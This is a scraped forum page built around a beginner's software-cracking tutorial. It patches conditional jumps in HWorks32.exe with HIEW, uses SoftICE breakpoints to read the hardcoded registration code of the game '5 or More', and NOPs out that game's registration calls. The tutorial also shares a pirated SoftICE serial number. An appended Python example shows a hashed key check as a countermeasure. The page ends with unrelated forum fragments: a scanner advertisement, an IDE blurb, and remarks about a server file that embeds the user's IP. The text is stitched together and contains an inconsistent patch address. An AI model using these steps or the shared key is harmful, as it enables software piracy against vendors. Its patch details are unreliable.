Look up to where it says :- Referenced by a (U)nconditional or ©onditional jump at address: |:0041BCCE© This means that the address 0041BCCE had a conditional jump (I.E a "Je" or "Jne" etc.) that told the program to go to the part of the code that follows the "Referenced by a (U)nconditional or ©onditional jump at address" text. Eg. When we go to the code location (address) 0041BCEE, we should see one of the following lines: je 0041BD4D ;or jne 0041BD4D ;or jz 0041BD4D (you get the picture). So lets scroll up to address 0041BCCE. It shouldn't be far away. Found the address? Look. Sure enough: :0041BCCE 0F8479000000 je 0041BD4D Write the address down. (Write down "0041BCCE") This instruction "je 0041BD4D" we are about to change, so that is "jne 0041BD4D". DON'T close W32Dasm yet. Minimize it. Run HIEW (Hackers' View). Find your original HWorks32.exe file and open it in HIEW. When this is done, press F4. From here you can select "Decode Mode" which is where we can change what the program does. Select Decode mode. Sure enough, you notice anything familiar? Yep. Good old assembly! Press F5. The top line will change colour and you will be able to put the address we wrote down in here. Put the address you made a note of. IMPORTANT - Make sure you put a dot (.) before the numbers. So type in (Without quotes of course) ".0041BCCE" Press return. You'll be at the line of code we saw in W32Dasm and wanted to change. Press F3. This will allow you to change stuff. Be VERY careful you don't accidentally change things you're not meant to. Press the right arrow key twice so the underscore is under the 8. Type 85. You changed Je (84) to Jne (85). It should be noted Je is not always 84 and Jne 85. It varies depending on how many bytes are in the instruction. "Bytes" consist of two hex characters. So the line we are editing has 6 bytes. (12 Characters). 
Other times, for example when there is only 2 bytes in the jump instruction, the first byte is the one you will modify, not the second. and in that case, je will be 74, and jne would be 75. But let's not go into that right now. You have changed the second byte in our instruction. That has changed je to jne. press F9 to update the file and get out of editing mode. Press F10 to get out of HIEW. Go and run "HWorks32.exe". This is the file you just changed. Go to Help, and About again. Type in any code. Click "Register". Presto! Registered! Choose a name and company and press OK. Get out of HWorks32.exe and then run it again to make sure it stays cracked. (You'll find a lot of programs you think you'll have cracked this way, but then when you run them after you exit, it'll say it's unregistered again). Yep. This is still regged. Congrats. You've just cracked your first program!!! Now you can close W32Dasm. (We just kept it open in case the byte we changed didn't do anything). The next thing I'm going to do is show you "SoftICE". Go get this superb program. You'll need it if you want to do "proper" cracking, where you find registration codes, without even modifying the program. That's the best, cleanest type of cracking you can do. It's also the type of cracking you'll get to feel you've really achieved something. Get SoftICE. It can be found at: http://soft.ivanovo.ru:8100/Win/SoftICE/si325w98.zip (copy and paste the URL into the browser to start downloading) You'll also need a program called "WinRAR". You can get it from www.download.com if you haven't got it already. Once you start installing it you'll be asked to enter your name and registration info. Register it. It's only £30...I used a code that I got passed on to me by another cracker by way of a tutorial. Usually you shouldn't use other peoples' reg info to reg programs. That's what lamers do who can't crack programs. 
However, cracking SoftICE requires specialist tools, and is, I expect, waaaaaaay beyond your (and my!) capability. SoftICE is a tool you WILL need to crack programs efficiently. Use the following registration number: "1907-0000DD-99". Follow the instructions and install. Let it make changes to your autoexec.bat, as it needs to be loaded as a program before Windows starts. When SoftICE is installed, go to the SoftICE directory and open the "winice.dat" file with Notepad. Find the line that says "INIT=Code On" or similar. Change that line to the following:

INIT="lines 60;color f a 4f 1f e;wd 22;wc 22;code on;x;"

This just tells the program how many lines to allow to each "section" of SoftICE, and it gives it some more interesting colours than the boring ones the installation gives it. Now go down to where it says "Examples of Export symbols" and there will be a list of files starting with ";EXP=". Remove all of the ; symbols from the beginning of those lines. This makes sure that when we restart our computer and go into SoftICE we can set "Breakpoints" on the Windows "API" (which is vital to us!). Save the file and restart your computer...

Okay, you're back. It might be a good idea to print out the next few paragraphs (until I say "Stop Printing"), because when you're in SoftICE, you can't access any other programs until you leave, and we don't want to be going back and forth between SICE (SoftICE) and Notepad all the time, and when we start cracking, we won't be able to get out of SoftICE or it'll ruin our work, and we'll have to start again.

---------------------------------------START PRINTING HERE---------------------------------------

Press Ctrl+D and you'll see SoftICE in all its glory. The top section with the first line of text starting with "EAX=" is the section of SoftICE for registers. Registers are places in memory.
Memory is where all the information is kept, and registers save the addresses of the places in memory that are important to the program at that time. (That's not the only way they work, but it's all you need to know for now.) The line of characters "o d i s z a p c" are all flags. ("o" is a flag, "d" is a flag etc.) The only important one to us right now is the "Zero" flag. That's the "z". You notice some flags will be highlighted. These are the flags that are active. Remember when we were talking about jumps, and we talked about "jz" (Jump if Zero) and "jnz" (Jump if Not Zero)? This is what it looks at. These flags are either active or inactive, but they are always there. For example, if in SoftICE we came across a piece of code that had a "jz" in it, we could look at the zero flag just before that function was carried out, and we would know whether the program would jump or not! Cool eh?

While we are talking about code, let's look at the code section of SICE. (The yellow (well, they should be yellow) lines separate the sections of SICE.) This 3rd section is the "Code Window". (I'll talk about the 2nd section in a minute.) The code window should look familiar. The difference between the code here and the code in W32Dasm is that the code here in SICE is actually being executed, and when you exit SICE, the highlighted (red) line of code will be executed straight away. This is one of the reasons SICE is so powerful. Look at the 2nd section. This is the "Data Window". This is the memory, basically. Type in:

d edx

and press Enter. You should see the Data Window change. What you've just told SICE to do is "Display EDX". SoftICE showed you the memory at EDX. Look at the Registers Window where it says EDX=(whatever). You will notice that the number after EDX is the first number in the Data Window. This is because EDX is storing the address in memory that you have just told SoftICE to display.
If you got a message saying "Invalid Address", don't worry, just use my example with EAX or ESI etc. I'm just trying to explain registers. That is how the Data Window works. The last section is just where you type in commands.

Now let's do a real crack! Get "5 or More" version 2.0a from: http://www.midstream.com Got the program? Good! Then let's begin: set the program up and run it. You'll see "EVALUATION COPY" at the top of the window. Go to "Help" and click on "Register". We see two boxes to enter the information that is needed to register the program. Go into SICE (Ctrl+D, remember). The next thing we do is "Break" into SoftICE when the program reads in what we enter. For the program to get the information we enter into the boxes, it will need to use the Windows API functions. We will need to tell SoftICE to come to life when a program uses one of these functions. Most programs will use one of the following functions:

"GetWindowText"
"GetWindowTextA"
"GetDlgItemText"
"GetDlgItemTextA"

The ones without the A's are for 16-bit programs, and since programs are not made much in 16-bit any more, it's usually just safe to use the ones with the A's. The A at the end of functions means it's for use with a 32-bit program only. So you're in SICE. I checked, and this program uses "GetDlgItemTextA". If you try to use "GetWindowTextA" you just get confused! So type in:

bpx getdlgitemtexta [Return]

bpx is simply the instruction to "BreakPoint on eXecute", i.e. the program breaks when it executes the API function or call. Anyway, type anything in the two boxes. I used "Liszt" for my name, and "12345" for my code. Click OK. !BAM! You're in SoftICE! You're at the point in the program where the program is calling the API function "GetDlgItemTextA" to get the name you entered. Press Ctrl+D to get out of SoftICE and you should be immediately brought back to SoftICE where the function is called again, this time to get the code you entered.
Remember for the future, you will have to let SoftICE break for however many boxes you have to fill in. If in a program you had to enter a name, a code, AND a company, for example, you would set the BreakPoint, press OK, get out of SoftICE, and then get out of SoftICE again, because it would have 3 boxes to read from, so it would need to call the function 3 times. Anyway, SoftICE has broken twice... We are now at the beginning of the "GetDlgItemTextA" function. The code in the code window below the highlighted line is the code for the function. Press F11. This lets the program carry out the function, but returns you to SoftICE IMMEDIATELY after the function has finished. Now you should be in the 5 or More program code. Press F10 until you get to the instruction:

call 00405EF0

When that instruction is highlighted, press F8. There is a good reason for this... Pressing F10 steps over calls, while F8 steps INTO calls. Example time... Pressing F10 will carry out all of the instructions it comes across inside the call, until the program returns to the point where the call was. OK, I think I'd better explain about calls now. Calls are similar to jumps. When there is a call, say for example we were to come across the following:

:004018D9 E8520D0000 call 00402630
:004018DE 8D4C2414 lea ecx, dword ptr [esp+14]
:004018E2 C684246C02000002 mov byte ptr [esp+0000026C], 02

the program goes to the address 00402630. What we have there, for example, is:

:00402630 6AFF push FFFFFFFF
:00402632 6896CF4000 push 0040CF96
:00402637 64A100000000 mov eax, dword ptr fs:[00000000]
:0040263D 50 push eax
:0040263E 64892500000000 mov dword ptr fs:[00000000], esp
:00402645 51 push ecx
:00402646 C3 ret

This means the program would carry out all of the instructions in this part of code (from 00402630) and when it got to 00402646 (a "Return" instruction) it would go to 004018DE (the instruction after the call to the above piece of code).
In SICE, pressing F10 at a call would execute all of the instructions until the return instruction automatically, without you having a chance to see what is going on inside the call. When you press F8, you go inside the code, and the instructions are executed one by one as you press F10 or F8. You should find that information valuable. Anyway, back to our example, "5 or More". You should have just pressed F8 instead of F10. Don't press anything else yet. Look at the code. You should be looking at the following instructions on the right side of the Code Window:

MOV EAX,[ESP+04]
TEST EAX,EAX
JZ 00405F32
CMP BYTE PTR [EAX],31
JNZ 00405F32
CMP BYTE PTR [EAX+01],36
JNZ 00405F32
CMP BYTE PTR [EAX+02],31
JNZ 00405F32
CMP BYTE PTR [EAX+03],33
JNZ 00405F32
CMP BYTE PTR [EAX+04],35
JNZ 00405F32
CMP BYTE PTR [EAX+05],35
JNZ 00405F32
CMP BYTE PTR [EAX+06],31
JNZ 00405F32
CMP BYTE PTR [EAX+07],30
JNZ 00405F32
CMP BYTE PTR [EAX+08],00
MOV EAX,00000001
JZ 00405F34
XOR EAX,EAX
RET

Okay, I'll try to explain what's going on here. The first line of the above code puts the registration code you entered into EAX. The second line tests EAX with itself, and if the outcome of the test is 0 (zero), that means that nothing was entered into the registration box, and if this happens, when the program reaches the next line of code, it will jump to 00405F32. So maybe the code at 00405F32 is the code to tell the program to get the error message. Looking at the next lines of code, there are a lot of things compared, and always, if the outcome here isn't zero, it will jump to the same address (00405F32). So it's pretty good to assume that the code at 00405F32 is the error message process, which must mean that this is the process that checks the registration code you entered against the valid code. Look in EAX by typing "d eax". Look at the writing in the DATA Window (the one above the Code Window). Look at the right side of this window. The code you entered should be at the first line.
The fourth line of the above code CoMPares the byte at EAX with the number 31. We can see EAX in the Data Window at the moment. We can see that the first number/letter in view is the first digit of the code you entered. This is the number/letter it compares to the number 31. When we see something like this, with lots of numbers around 30, it will usually be hex. You can find out what the "ASCII" (normal) value of hex 31 is by typing in "? 31". It will show you different values; the one at the end in the quotation marks is the "Normal Value". We see that hex 31 = normal 1. That tells us that the program compares your first digit to 1. If the first digit of the code you entered isn't 1, the program will jump in the fifth line of the above code to the error message (00405F32). The next (sixth) line of code compares EAX+01 to hex 36. EAX+01 is as simple as that - EAX+01. If you type in "d eax+01" it will show you the second digit of the code you entered, because it is EAX plus 01 place, which means the second digit of the code you entered. (I hope you understood that!) Type "? 36". You see that it compares the second digit of the code you entered with 6. (Assuming, of course, it hadn't already jumped after the 1st compare!) So we can see that the first two numbers of the valid registration code are 1 and 6. By looking at the rest of the code down to the 19th line of the above code, we can see that the correct registration code is:

16135510

An important thing to mention is that the valid registration code was already inside the program, and didn't have to be calculated. That tells us that the registration code will work for any name you enter. Other, more difficult programs will take your entered code, make the correct code for the name you entered, and compare the correct code with the one you entered. This means that codes will be different for each name that is entered in harder programs. (This program is easy to crack.)
Before you leave SoftICE, let's look at the rest of the code above. The 20th line compares EAX+08 to hex 00. If you type "? 00" you'll see that 00 is equal to nothing. That does NOT mean a space (a space is hex 20); it means hex 00 is equal to nothing, so the program is just checking that there wasn't anything entered after the final digit. The actual program won't let you enter more than 8 characters anyway, so this must be in case bad crackers try to modify the contents of the memory and mess up. So the CMP BYTE PTR [EAX+07],30 is the last digit of the code. If for some reason the memory contains more than 8 characters at EAX, it would jump to a different part of code that I haven't bothered to look at because it is irrelevant. The next line (XOR EAX,EAX) zeroes EAX, because it doesn't need it any more. (Note from CrackZ - actually this code is never executed; see the MOV EAX,1 = good guy and EAX=0 is bad. EAX's value is checked after the RET.) The next line is RET (Return). When the program (if the code is correct) reaches this, it will go back to the line after the call we pressed F8 at. See how calls work now? When we are sent to the first line of the above code by the call, there aren't any instructions that jump to a good registration message, only jumps to the bad message, so theoretically it would be possible to crack the program using "Hackers' View" by finding the address of the call to the registration routine, and simply replacing the call instruction with NOP (No OPeration) instructions. In fact, yeah, we'll try that in a minute! You can leave SoftICE now, but make sure you clear all of the breakpoints before you leave, because we don't need them any more. To do this type "bc *". Get out of SICE (Ctrl+D). Go to Help in 5 or More, and go to Register. Type in any name, and the code we found out (16135510). WOW! It worked. Don't you feel good? You didn't even have to modify the program's code! It's a "Clean Crack"!
---------------------------------------STOP PRINTING HERE----------------------------------------

Okay, now close the program. Go to the Windows directory and find "5ormore.ini". Delete it. Now go back to the game directory and make a backup of 5ormore.exe in case we screw up. (You may want to rename it 5ormore.w32.) Done? Good. Run HIEW (Hackers' View) and open 5ormore.exe. Press F4 and select Decode Mode. Press F5 and type ".0040609D" (this is the address that calls the registration check - the place we pressed F8). You are at the line:

.0040609D E84EFEFFFF call 00405EF0

This is the right line. We want to get rid of the call, so we are going to change the bytes that tell the program what to do. I'll explain something first. Look at the E84EFEFFFF. These are the letters and numbers that tell the program what to do. They are what we change. To tell the program to jump to the registration check, it needs 5 bytes (remember, a byte is two characters). So we need to make sure we replace exactly 5 bytes, no more, no less. A NOP instruction (No OPeration) only requires 1 byte, so we will need to put in 5 NOP instructions, so it has just cancelled the call without doing anything else. Press F3. Now, carefully change the bytes to NOPs by typing "90" five times. Press F9. Press F10. Go back to 5ormore.exe and run the program. Go to Register and type in a name and any old number (not the correct one). It says regged! Great! Close the program, and then start it again to make sure... It says UNREGISTERED!!!! There is a simple reason for this. Each time the program begins, it gets the registration information you entered last time from the 5ormore.ini file in the Windows directory, and then carries out the registration check again on the information to check the information is valid. So unless you want to go to Register every single time you play the game, we have more work to do. Run W32Dasm. Open 5ormore.W32 (the backup copy). Look at the disassembly. Click on Find.
Type in:

call 00405EF0

Now click OK. Remember, the call to 00405EF0 is the call to the registration check. When W32Dasm has found something, write the address down. You should find two occurrences. The first address should be "00405EE2", and the second should be "0040609D". You can close W32Dasm if you want, because I know what we have to do, and we won't need it any more. Run HIEW and open 5ormore.exe. Press F4 and go to Decode Mode. We are going to get rid of both of these calls that we wrote down. Press F5 and type ".00406EE2" (this is the first address you wrote down). Press F3. There are 5 bytes in this call instruction, so we will need to type in "90" five times. Done? Press F9 to update the file. Now the next address. Type ".0040609D" (the other address from W32Dasm). Huh? What's this, there's already five NOPs here! Yep. That's because, remember, you already changed this one, before we found out that it checked the "5ormore.ini" file when it starts. We saw it as a call in W32Dasm because we loaded the backup file, and we hadn't changed that file whatsoever with HIEW. So close HIEW. Run "5ormore.exe". Wow! It will stay registered this time! Exit 5 or More, run 5 or More, exit 5 or More, run 5 or More. Yeah, we made it so that the program didn't find an error with the registration information when it starts. (That's because we stopped it from checking the code, so it couldn't jump to the unregistered code routine.) There we go! If you can find registration codes using SoftICE, do that, because it's so much better than modifying a program. I hope this information has been valuable! It should have been! If you couldn't understand it, go through it all again. (I'm NOT kidding. If you want to learn, you have to understand these things.) If I get enough e-mails requesting more tutorials, I'll certainly consider it. If I get enough requests, I'll talk more about finding codes in SoftICE, where the program has to calculate your own code (much harder most of the time).
All comments, questions and suggestions welcomed. Note: if some links don't work, try googling the tool or the program; sorry for the inconvenience. Best regards, Aym
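An added example, not code from Aym's tutorial or from the 5 or More program: the check routine at 00405EF0, as the tutorial reads it, rewritten in Python next to a variant that embeds only a SHA-256 digest of the key, so the valid code is no longer sitting in the operands of a chain of compare instructions. The names check_as_in_binary, check_hashed, make_digest and KEY_DIGEST are chosen here; the byte values are the ones the tutorial's CMP instructions test.

```python
"""Added example, not code from the tutorial or from the 5 or More program.

check_as_in_binary() mirrors the disassembled routine at 00405EF0 as the
tutorial reads it: a byte-by-byte compare of the entered code against a
constant, which is why the key can be read straight off the CMP operands.
check_hashed() is the defensive counterpart: the program ships only a digest,
so a reader of the binary sees a hash, not the key."""
import hashlib
import hmac
from typing import Optional

# The byte values the tutorial's CMP instructions test, in order:
# '1','6','1','3','5','5','1','0' (hex 31 36 31 33 35 35 31 30).
EXPECTED_BYTES = (0x31, 0x36, 0x31, 0x33, 0x35, 0x35, 0x31, 0x30)


def check_as_in_binary(entered: Optional[bytes]) -> int:
    """Return EAX as the routine would: 1 for a valid code, 0 otherwise."""
    if entered is None:            # TEST EAX,EAX / JZ 00405F32: no buffer to read
        return 0
    buf = entered + b"\x00"        # what the routine sees: a NUL-terminated string
    for i, expected in enumerate(EXPECTED_BYTES):
        if buf[i] != expected:     # CMP BYTE PTR [EAX+i],xx / JNZ 00405F32
            return 0               # "bad guy": error message path
    if buf[8] != 0x00:             # CMP BYTE PTR [EAX+08],00: nothing after digit 8
        return 0
    return 1                       # MOV EAX,00000001 / RET: "good guy"


def make_digest(key: bytes) -> bytes:
    """Build-time step: run on the developer's side, not in the shipped program."""
    return hashlib.sha256(key).digest()


# Constructed stand-in for the 32-byte literal a real build would embed.
# Only this digest would be in the binary; the key "16135510" would not.
KEY_DIGEST = make_digest(b"16135510")


def check_hashed(entered: Optional[bytes], key_digest: bytes = KEY_DIGEST) -> bool:
    """Digest comparison: no per-byte early exit, and no key in the program.

    Caveats: an 8-digit key has only 10**8 values, so the digest can still be
    brute-forced offline (a per-user key tied to the name, as the tutorial's
    "harder programs" do, raises that bar); and hiding the key does nothing
    against patching the caller that tests the return value, which the
    tutorial's NOP edit shows. Both checks belong together, not one or the other."""
    if entered is None or len(entered) != len(EXPECTED_BYTES):
        return False
    return hmac.compare_digest(hashlib.sha256(entered).digest(), key_digest)


if __name__ == "__main__":
    for code in (b"12345", b"16135510", b"161355100"):   # the tutorial's inputs plus an overlong one
        print(code, "EAX =", check_as_in_binary(code), "hashed:", check_hashed(code))
```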
  20. Nytro

    Where is the token?

    Use the Default theme... I've said it 100 times already.
  21. Audit your web site security with Acunetix Web Vulnerability Scanner

If web applications are not secure, then your entire database of sensitive information is at serious risk. Why?

- Websites and related web applications must be available 24 x 7 to provide the required service to customers, employees, suppliers and other stakeholders.
- Firewalls and SSL provide no protection against web application hacking, simply because access to the website has to be made public.
- Web applications often have direct access to backend data such as customer databases and, hence, control valuable data and are much more difficult to secure.
- Custom applications are more susceptible to attack because they involve a lesser degree of testing than off-the-shelf software.
- Hackers prefer gaining access to the sensitive data because of the immense pay-offs in selling the data.

Acunetix Web Vulnerability Scanner (WVS) is an automated web application security testing tool that audits your web applications by checking for exploitable hacking vulnerabilities. Automated scans may be supplemented and cross-checked with the variety of manual tools to allow for comprehensive web site and web application penetration testing.

In-depth checking for SQL Injection, Cross Site Scripting (XSS) and other vulnerabilities

Acunetix checks for all web vulnerabilities including SQL injection, cross site scripting and others. SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitor's browser. Detection of these vulnerabilities requires a sophisticated detection engine. Paramount to web vulnerability scanning is not the number of attacks that a scanner can detect, but the complexity and thoroughness with which the scanner launches SQL injection, cross site scripting and other attacks.
Acunetix has a state-of-the-art vulnerability detection engine which quickly finds vulnerabilities with a low number of false positives. It also locates CRLF injection, code execution, directory traversal, file inclusion and authentication vulnerabilities.

AcuSensor Technology - identify more vulnerabilities with fewer false positives

Allowing you to identify more vulnerabilities than a traditional black box web application scanner and generating fewer false positives, Acunetix AcuSensor Technology combines black box scanning techniques with feedback from sensors placed inside the source code while the source code is being executed. The advantages of AcuSensor Technology are many. These include: locating and fixing vulnerabilities faster, whilst providing more information about each vulnerability, such as source code line number, stack trace and affected SQL query; it also checks for web application configuration problems, such as misconfiguration of web.config or php.ini files; detects many more SQL injection vulnerabilities without depending on web server error messages; and many more.

Download: Manual:
  22. Shell: Download:
  23. Nytro

    PHPed 5.6

    PhpED is the Integrated Development Environment for PHP (PHP IDE), HTML, CSS, XML, SMARTY, XHTML and others. A balanced combination of an advanced code editor, reliable dbg debugger, productive database connectivity client and fast and secure deployment abilities makes PhpED a complete solution for the most sophisticated developer needs. As in any complicated process, in PHP development a great deal of effectiveness depends on your choice of production tools. According to our customers, PhpED 5.6 saves up to 75% of development time. With PhpED you can:

    Create: Code creation with our PHP IDE got a lot easier with the new PhpED 5.6 editing features. With PhpED's new highlighting abilities you can now navigate through your code easily and save precious developing time. PHP Code Folding sets NuSphere PHP IDE apart from all others.

    Debug: The powerful PHP Debugger is one of the best features in PhpED. Debug your code locally or remotely.

    Profile: Introduced by NuSphere, PHP Profiler helps you find and eliminate all the bottlenecks in the code.

    Deploy: Secure, fast and flexible publishing of your PHP scripts to a remote server right from the PHP IDE. All major protocols such as FTP, FTPS, SSH/SFTP, and WebDAV are supported.

    Integrate: New extensibility scope allows you to integrate PhpED with 3rd party tools like PHP encoders, formatters or HTML validators. Pre-configured tools already include php documentor, html tidy, cvs client and html validator.

    Major features: Download:
  24. You can't really connect, except as long as you have the same IP you created the server with. If you open the server with Notepad you'll see your IP at the end. I need to add a DNS option.
  25. Seeing the Web without them knowing isn't really possible. The avatar is 96x96. Showing the IP is possible. PS: See v1.2 and stop double posting.